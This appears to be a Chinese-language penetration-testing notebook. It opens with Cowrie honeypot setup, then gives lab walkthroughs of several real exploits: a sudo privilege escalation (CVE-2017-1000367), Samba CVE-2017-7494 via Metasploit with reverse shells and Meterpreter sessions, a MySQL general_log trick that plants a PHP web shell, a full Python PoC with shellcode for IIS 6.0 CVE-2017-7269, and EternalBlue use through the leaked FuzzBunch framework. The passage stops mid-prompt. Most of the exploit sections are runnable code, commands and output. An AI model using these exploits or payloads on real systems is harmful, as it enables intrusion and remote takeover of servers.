MariaDB [cowrie]> source /home/cowrie/cowrie/doc/sql/mysql.sql;

MariaDB [cowrie]> show tables;

+------------------+

| Tables_in_cowrie |

+------------------+

| auth             |

| clients          |

| downloads        |

| input            |

| keyfingerprints  |

| sensors          |

| sessions         |

| ttylog           |

+------------------+

8 rows in set (0.00 sec)

然后修改cowrie.cfg中关于mysql的配置,启动Cowrie

[root@localhost cowrie]# su cowrie

[cowrie@localhost cowrie]$ ./bin/cowrie start

Not using Python virtual environment

Starting cowrie: [twistd   --umask 0022 --pidfile var/run/cowrie.pid -l log/cowrie.log cowrie ]...

登录密码记录

MariaDB [cowrie]> select * from auth;

+----+--------------+---------+----------+----------+---------------------+

| id | session      | success | username | password | timestamp           |

+----+--------------+---------+----------+----------+---------------------+

|  1 | c66e2505a393 |       1 | root     | hehe123  | 2017-09-13 23:58:48 |

+----+--------------+---------+----------+----------+---------------------+

1 row in set (0.01 sec)

执行命令记录

MariaDB [cowrie]> select * from input;

+----+--------------+---------------------+-------+---------+---------+

| id | session      | timestamp           | realm | success | input   |

+----+--------------+---------------------+-------+---------+---------+

|  1 | c66e2505a393 | 2017-09-13 23:58:51 | NULL  |       1 | whoami  |

+----+--------------+---------------------+-------+---------+---------+

1 row in set (0.01 sec)

下载文件记录

MariaDB [cowrie]> select * from downloads\G

*************************** 1. row ***************************

       id: 1

  session: c66e2505a393

timestamp: 2017-09-14 00:01:23

      url: https://www.baidu.com/img/bd_logo1.png

  outfile: dl/264ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a302602500c589847f5

   shasum: 264ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a302602500c589847f5

1 row in set (0.00 sec)

 

0x04 目录结构

data/userdb.txt:设置SSH密码文件

[root@localhost cowrie]# cat data/userdb.txt

root:x:!root

root:x:!123456

root:x:*

txtcmds/*:命令执行返回结果文件

[root@localhost bin]# file df

df: ASCII text

[root@localhost bin]# cat df

Filesystem                                              Size  Used Avail Use% Mounted on

rootfs                                                  4.7G  731M  3.8G  17% /

udev                                                     10M     0   10M   0% /dev

tmpfs                                                    25M  192K   25M   1% /run

/dev/disk/by-uuid/65626fdc-e4c5-4539-8745-edc212b9b0af  4.7G  731M  3.8G  17% /

tmpfs                                                   5.0M     0  5.0M   0% /run/lock

tmpfs                                                   101M     0  101M   0% /run/shm

dl/*:攻击者通过curl/wget下载的文件。

[root@localhost dl]# ls

264ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a302602500c589847f5

/bin/playlog:用于重演会话日志,日志存在于log/tty/目录下,可以查看攻击者执行命令过程。

[root@localhost cowrie]# ./bin/playlog  log/tty/20170913-233922-21cf6e129ef5-0i.log

data/fs.pickle:伪装的文件系统

honeyfs/:伪装文件系统的文件内容

[root@localhost cowrie]# cat honeyfs/etc/issue 

Debian GNU/Linux 7 \n \l

log/cowrie.json:JSON格式的处理输出

log/cowrie.log:log/debug输出

 

 

CVE-2017-1000367:Sudo本地提权漏洞

漏洞详情
CVE-2017-1000367:当确定tty时,Sudo没有正确解析/ proc / [pid] / stat的内容,本地攻击者可能会使用此方法来覆盖文件系统上的任何文件,从而绕过预期权限或获取root shell。

利用前提
1)必须开启了Selinux
2)用于必须要有sudo权限,即用户需要添加到/etc/sudoers中

检查方法
Centos /RHEL /SUSE /OpenSuse:rpm -qa|grep sudo
Ubuntu /Debian:dpkg -l sudo

修复方案
yum update sudo

修复版本

1、Centos /Redhat
Centos /RHEL 7 :1.8.6p7-22.el7_3
Centos /RHEL 6 :1.8.6p3-28.el6_9
Centos /RHEL 5 :1.7.2p1-30.el5_11
2、Ubuntu
Ubuntu 14.04:1.8.9p5-1ubuntu1.4
Ubuntu 16.04:1.8.16-0ubuntu1.4
Ubuntu 16.10:1.8.16-0ubuntu3.2
Ubuntu 17.04:1.8.19p1-1ubuntu1.1
3、Debian
Debian wheezy:1.8.5p2-1+nmu3+deb7u3
Debian jessie:1.8.10p3-1+deb8u4
4、SUSE /OpenSuse
1.8.10p3-2.11.1
1.8.10p3-10.5.1

CentOS7下测试过程:
查看下sudo的版本:

[root@localhost yum.repos.d]# rpm -qa | grep sudo
sudo-1.8.6p7-16.el7.x86_64

添加sudo权限

[root@localhost yum.repos.d]# grep 'vinc' /etc/sudoers
vinc ALL=(ALL) NOPASSWD: /usr/bin/sum

检测Selinux是否开启

[root@localhost yum.repos.d]# getenforce 
Enforcing

提权程序:https://github.com/c0d3z3r0/sudo-CVE-2017-1000367
普通账户vinc对/etc/motd没有写入权限。

[vinc@localhost tmp]$ ll /etc/motd
-rw-r--r--. 1 root root 106 7月 6 19:44 /etc/motd
[vinc@localhost ~]$ echo 1 > /etc/motd
-bash: /etc/motd: 权限不够
然后执行提权程序
[vinc@localhost tmp]$ gcc -o sudopwn sudopwn.c -lutil
[vinc@localhost tmp]$ ./sudopwn 
[vinc@localhost tmp]$ cat /etc/motd 
/usr/bin/sum:无法识别的选项“--
HELLO
WORLD
”
Try '/usr/bin/sum --help' for more information.

发现/etc/motd被覆盖了。

参考文章:
http://bbs.pediy.com/thread-218260.htm
https://github.com/c0d3z3r0/sudo-CVE-2017-1000367

Samba远程代码执行漏洞利用

Samba是Linux和UNIX系统的SMB协议服务软件,可以实现与其他操作系统(如:微软Windows操作系统)进行文件系统、打印机和其他资源的共享。此次漏洞最早影响到7年前的版本,黑客可以利用漏洞进行远程代码执行。

漏洞编号
CVE-2017-7494

影响版本
Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本

漏洞简介
攻击者利用漏洞可以进行远程代码执行,具体执行条件如下:
1. 服务器打开了文件/打印机共享端口445,让其能够在公网上访问
2. 共享文件拥有写入权限
3. 恶意攻击者需猜解Samba服务端共享目录的物理路径
满足以上条件时,由于Samba能够为选定的目录创建网络共享,当恶意的客户端连接上一个可写的共享目录时,通过上传恶意的链接库文件,使服务端程序加载并执行它,从而实现远程代码执行。根据服务器的情况,攻击者还有可能以root身份执行。

环境搭建
测试机:Kali 172.16.100.180

mkdir /tmp/share #创建共享目录
chmod 777 /tmp/share #设置权限
vim /etc/samba/smb.conf
[MyShare]
path = /tmp/share
browsable =yes
writable = yes
guest ok = yes
service smb start

攻击机:Kali 172.16.100.177
msf已经新增了专门的模块,可以使用这个msf模块进行检测。
https://github.com/hdm/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb
放到/usr/share/metasploit-framework/modules/exploits/linux/samba/下
执行reload_all

msf > use exploit/linux/samba/is_known_pipename 
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_BASE no The remote filesystem path correlating with the SMB share name
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory


Exploit target:

Id Name
-- ----
2 Linux x86


msf exploit(is_known_pipename) > set rhost 172.16.100.180
rhost => 172.16.100.180
msf exploit(is_known_pipename) > set smb_share_base /tmp/share
smb_share_base => /tmp/share
msf exploit(is_known_pipename) > set target 3
target => 3
msf exploit(is_known_pipename) > exploit

[*] Started reverse TCP handler on 172.16.100.177:4444 
[*] 172.16.100.180:445 - Using location \\172.16.100.180\MyShare\ for the path
[*] 172.16.100.180:445 - Payload is stored in //172.16.100.180/MyShare/ as KpKNwIOz.so
[*] 172.16.100.180:445 - Trying location /tmp/share/KpKNwIOz.so...
[*] Command shell session 1 opened (172.16.100.177:4444 -> 172.16.100.180:37166) at 2017-05-27 11:05:56 +0800

whoami
nobody
^Z
Background session 1? [y/N] y
msf exploit(is_known_pipename) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.100.177:4433 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 172.16.100.180
[*] Command stager progress: 100.00% (668/668 bytes)
msf exploit(is_known_pipename) > [*] Meterpreter session 2 opened (172.16.100.177:4433 -> 172.16.100.180:37446) at 2017-05-27 11:06:39 +0800

msf exploit(is_known_pipename) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo 
Computer : kali
OS : Linux kali 4.9.0-kali3-amd64 #1 SMP Debian 4.9.16-1kali1 (2017-03-24) (x86_64)
Architecture : x64
Meterpreter : x86/linux

这里需要设置几个参数
rhost 设置目标IP地址
rport 设置目标端口,默认是445
smb_share_base 设置smb目录,这里靶机是/tmp/share
target 设置系统版本,这里系统为64位,所以设置为3
0 –> Auto
1 –> Linux ARM (LE)
2 –> Linux x86
3 –> Linux x86_64

参考文章
https://xianzhi.aliyun.com/forum/read/1632.html

Mysql利用general_log Getshell

感觉这种方式和redis通过持久化定时任务道理一样,都是通过命令修改系统配置来实现。
Windows下用phpstudy测试:
查看general_log的配置情况

mysql> show global variables like "%genera%";
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| general_log      | OFF            |
| general_log_file | E:/WWW/cmd.php |
+------------------+----------------+
2 rows in set (0.02 sec)
mysql> set global general_log='on';
Query OK, 0 rows affected (0.12 sec)
mysql> SET global general_log_file='E:/WWW/cmd.php';
Query OK, 0 rows affected (0.01 sec)
mysql> show global variables like "%genera%";
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| general_log      | ON             |
| general_log_file | E:/WWW/cmd.php |
+------------------+----------------+
2 rows in set (0.00 sec)
mysql> SELECT '<?php @assert($_POST["cmd"]);?>';
+---------------------------------+
| <?php @assert($_POST["cmd"]);?> |
+---------------------------------+
| <?php @assert($_POST["cmd"]);?> |
+---------------------------------+
1 row in set (0.00 sec)

查看文件内容

使用菜刀连接即可。

Linux下测试,首先需要Mysql有Web目录的写入权限,这里先将Web目录权限改为777,然后看一下生成的general_log文件的权限
[root@server120 html]# ls -al cmd.php
-rw-rw—- 1 mysql mysql 177 5月  26 10:33 cmd.php
发现文件权限是660,即默认的apache启动账户apache是没有读权限的。这里和umask设置没有关系。

vim /etc/profile
if [ $UID -gt 199 ] && [ "`id -gn`" = "`id -un`" ]; then
    umask 002
else
    umask 022
fi

这里的权限如果uid大于199,umask就是002,所对应用户创建的文件权限是666-002=664,目录权限是777-002=775。而general_log文件的权限为660,所以和umask的配置没关系。

MySQL中有一个名为secure_file_priv的全局系统变量。这个变量用于限制数据导入和导出操作造成的影响,例如由LOAD DATA 和SELECT…INTO OUTFILE语句和LOAD_FILE()函数执行的操作。

Secure_file_priv是一个全局变量,它是一个只读变量,你不能在运行时改变它。

如果变量设置为目录的名称,则服务器会将导入和导出操作限制在跟这个目录中一起使用。这个目录必须存在,服务器不会自己创建它。

如果变量为空,则不会产生影响,引起不安全的配置。

如果变量设置为NULL,那么服务器就会禁用导入和导出操作。

在/etc/my.cnf中【mysqld】下新增

secure_file_priv=/tmp/

测试:

mysql> select * from test union select 1 into outfile '/opt/mysql.txt';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

mysql> select * from test union select 1 into outfile '/tmp/mysql.txt';

Query OK, 4 rows affected (0.00 sec)

 

 

IIS 6.0曝远程代码执行漏洞CVE-2017-7269

漏洞描述


Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If: <http://”开头的长header PROPFIND请求,执行任意代码。该漏洞自2016年7、8月起就已被利用。

利用前提


开启WebDAV

影响版本


Windows Server 2003 R2

测试环境


172.16.100.162 Windows 2003 SP2 32位系统(测试64位系统下无法复现)

POC


 

#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.

#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China

#-----------Email: edwardz@foxmail.com

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sock.connect(('172.16.100.162',80))

pay='PROPFIND / HTTP/1.1\r\nHost: 172.16.100.162\r\nContent-Length: 0\r\n'

pay+='If: <http://172.16.100.162/aaaaaaa'

pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'

pay+='>'

pay+=' (Not <locktoken:write1>) <http://172.16.100.162/bbbbbbb'

pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'

shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'

pay+=shellcode

pay+='>\r\n\r\n'

print pay

sock.send(pay)

data = sock.recv(80960)

print data

sock.close

测试结果


开启了计算机进程

MSF测试


https://github.com/dmchell/metasploit-framework/blob/master/modules/exploits/windows/iis/cve-2017-7269.rb
拷贝到/usr/share/metasploit-framework/modules/exploits/windows/iis中

msf > use exploit/windows/iis/cve-2017-7269
msf exploit(cve-2017-7269) > set rhost 172.16.100.162
rhost => 172.16.100.162
msf exploit(cve-2017-7269) > exploit

[*] Started reverse TCP handler on 172.16.100.177:4444 
[*] Sending stage (957487 bytes) to 172.16.100.162
[*] Meterpreter session 1 opened (172.16.100.177:4444 -> 172.16.100.162:1984) at 2017-04-24 11:56:48 +080

meterpreter > sysinfo 
Computer : VINCENT
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows

 

参考文章


http://www.tuicool.com/articles/fMrEn2m
http://www.freebuf.com/vuls/130531.html

ShadowBroker工具使用测试

事件过程


1. 在2016 年 8 月有一个 “Shadow Brokers” 的黑客组织号称入侵了方程式组织窃取了大量机密文件,并将部分文件公开到了互联网上,方程式(Equation Group)据称是 NSA(美国国家安全局)下属的黑客组织,有着极高的技术手段。这部分被公开的文件包括不少隐蔽的地下的黑客工具。另外 “Shadow Brokers” 还保留了部分文件,打算以公开拍卖的形式出售给出价最高的竞价者,“Shadow Brokers” 预期的价格是 100 万比特币(价值接近5亿美元)。而“Shadow Brokers” 的工具一直没卖出去。
2. 北京时间 2017 年 4 月 8 日,“Shadow Brokers” 公布了保留部分的解压缩密码,有人将其解压缩后的上传到Github网站提供下载。
3. 北京时间 2017 年 4 月 14 日晚,继上一次公开解压密码后,“Shadow Brokers” ,在推特上放出了第二波保留的部分文件,此次发现其中包括新的23个黑客工具。
这些黑客工具被命名为OddJob,EasyBee,EternalRomance,FuzzBunch,EducatedScholar,EskimoRoll,EclipsedWing,EsteemAudit,EnglishMansDentist,MofConfig,ErraticGopher,EmphasisMine,EmeraldThread,EternalSynergy,EwokFrenzy,ZippyBeer,ExplodingCan,DoublePulsar等。

受影响Windows版本


Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

工具下载


1)Python2.6和pywin32安装包(注意都是32位的,不然会导致调用dll payload文件失败)
http://pan.baidu.com/s/1jHKw0AU 密码:kuij
2)Shadowbroker放出的NSA攻击工具
https://github.com/misterch0c/shadowbroker
windows: 包括 Windows利用工具, 植入式的恶意软件 和一些攻击代码
swift: 包括 银行攻击的一些内容
oddjob: 包括与ODDJOB 后门相关的doc
3)中招检查工具
https://github.com/countercept/doublepulsar-detection-script

测试环境


172.16.100.128 Kali
172.16.100.174 Windows 2003 SP2  攻击机
172.16.100.176 Windows XP SP3  靶机(需要关闭防火墙,开启防火墙会拦截445端口)

FUZZBUNCH框架测试


FuzzBunch有点类似于metasploit,并且可跨平台,通过fb.py使用。
首先在C:\shadowbroker\windows下创建目录listeningposts和log_dirs
来到C:\shadowbroker\windows目录下运行fb.py

C:\shadowbroker\windows>python fb.py

--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

  0) prompt confirm
  1) execute


Exploit Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Special Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Payload Autorun List
====================

  0) apply
  1) prompt confirm
  2) execute


[+] Set FbStorage => C:\shadowbroker\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] : 172.16.100.176
[?] Default Callback IP Address [] : 172.16.100.174
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : log_dirs
[*] Checking C:\shadowbroker\windows\log_dirs for projects
Index     Project
-----     -------
0         smb_log_dirs
1         Create a New Project

[?] Project [0] : 1
[?] New Project Name :
[?] Set target log directory to 'C:\shadowbroker\windows\log_dirs\z172.16.100.17
6'? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => 172.16.100.176
[+] Set CallbackIp => 172.16.100.174

[!] Redirection OFF
[+] Set LogDir => C:\shadowbroker\windows\log_dirs\z172.16.100.176

Module: Global Variables
========================

Name                    Value
----                    -----
ResourcesDir            D:\DSZOPSDISK\Resources
Color                   True
ShowHiddenParameters    False
FbStorage               C:\shadowbroker\windows\storage
LogDir                  C:\shadowbroker\windows\log_dirs\z172.16.100.176
TargetIp                172.16.100.176
CallbackIp              172.16.100.174
TmpDir                  C:\shadowbroker\windows\log_dirs\z172.16.100.176
NetworkTimeout          60

其中Target IP为靶机IP,Callback IP为运行fb.py的攻击机IP。
use命令的用途是选择插件,如下所列:

fb > use
Architouch           Esteemaudit          Printjoblist
Darkpulsar           Esteemaudittouch     Processlist
Domaintouch          Eternalblue          Regdelete
Doublepulsar         Eternalchampion      Regenum
Easybee              Eternalromance       Regread
Easypi               Eternalsynergy       Regwrite
Eclipsedwing         Ewokfrenzy           Rpcproxy
Eclipsedwingtouch    Explodingcan         Rpctouch
Educatedscholar      Explodingcantouch    Smbdelete
Educatedscholartouch Iistouch             Smblist
Emeraldthread        Jobadd               Smbread
Emeraldthreadtouch   Jobdelete            Smbtouch
Emphasismine         Joblist              Smbwrite
Englishmansdentist   Mofconfig            Webadmintouch
Erraticgopher        Namedpipetouch       Worldclienttouch
Erraticgophertouch   Pcdlllauncher        Zippybeer
Eskimoroll           Printjobdelete

插件被分解成几类:
目标识别和利用漏洞发现:Architouch,Rpctouch,Domaintouch,Smbtouch等。;
漏洞利用:EternalBlue,Emeraldthread,Eclipsedwing,EternalRomance等。;
目标攻击后后操作:Douplepulsar,Regread,Regwrite等。
然后我们通过使用Smbtouch使用smb协议来检测对方操作系统版本、架构、可利用的漏洞。

fb > use Smbtouch

[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.100.176
fb Touch (Smbtouch) > execute

[!] Preparing to Execute Smbtouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels

[+] Configure Plugin Remote Tunnels


Module: Smbtouch
================

Name                    Value
----                    -----
NetworkTimeout          60
TargetIp                172.16.100.176
TargetPort              445
RedirectedTargetIp
RedirectedTargetPort
UsingNbt                False
Pipe
Share
Protocol                SMB
Credentials             Anonymous

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] SMB Touch started

[*] TargetIp              172.16.100.176
[*] TargetPort            445
[*] RedirectedTargetIp    (null)
[*] RedirectedTargetPort  0
[*] NetworkTimeout        60
[*] Protocol              SMB
[*] Credentials           Anonymous

[*] Connecting to target...
        [+] Initiated SMB connection

[+] Target OS Version 5.1 build 2600
    Windows 5.1

[!] Target could be either SP2 or SP3,
[!] for these SMB exploits they are equivalent

[*] Trying pipes...
        [+] spoolss    - Success!

[+] Target is 32-bit

[Not Supported]
        ETERNALSYNERGY  - Target OS version not supported

[Vulnerable]
        ETERNALBLUE     - DANE
        ETERNALROMANCE  - FB
        ETERNALCHAMPION - DANE/FB

[*] Writing output parameters

[+] Target is vulnerable to 3 exploits
[+] Touch completed successfully

[+] Smbtouch Succeeded

目标系统似乎有三个漏洞可以利用(EternalBlue,EternalRomance和EternalChampion),看网上的测试都是利用的EternalBlue,我们来试一下

fb Touch (Smbtouch) > use eternalblue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.100.176

[*] Applying Session Parameters
[-] Error: Invalid value for Target (XP_SP2SP3_X86)
[-] Skipping 'Target'
[*] Running Exploit Touches


[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
Target                WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 f
or no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [172.16.100.176] :

[*]  TargetPort :: Port used by the SMB service for exploit connection

[?] TargetPort [445] :

[*]  VerifyTarget :: Validate the SMB string from target against the target sele
cted before exploitation.

[?] VerifyTarget [True] :

[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor befor
e throwing. This option must be enabled for multiple exploit attempts.

[?] VerifyBackdoor [True] :

[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Dis
abled for XP/2K3.

[?] MaxExploitAttempts [3] :

[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup
allocations (XK/2K3) to do.

[?] GroomAllocations [12] :

[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
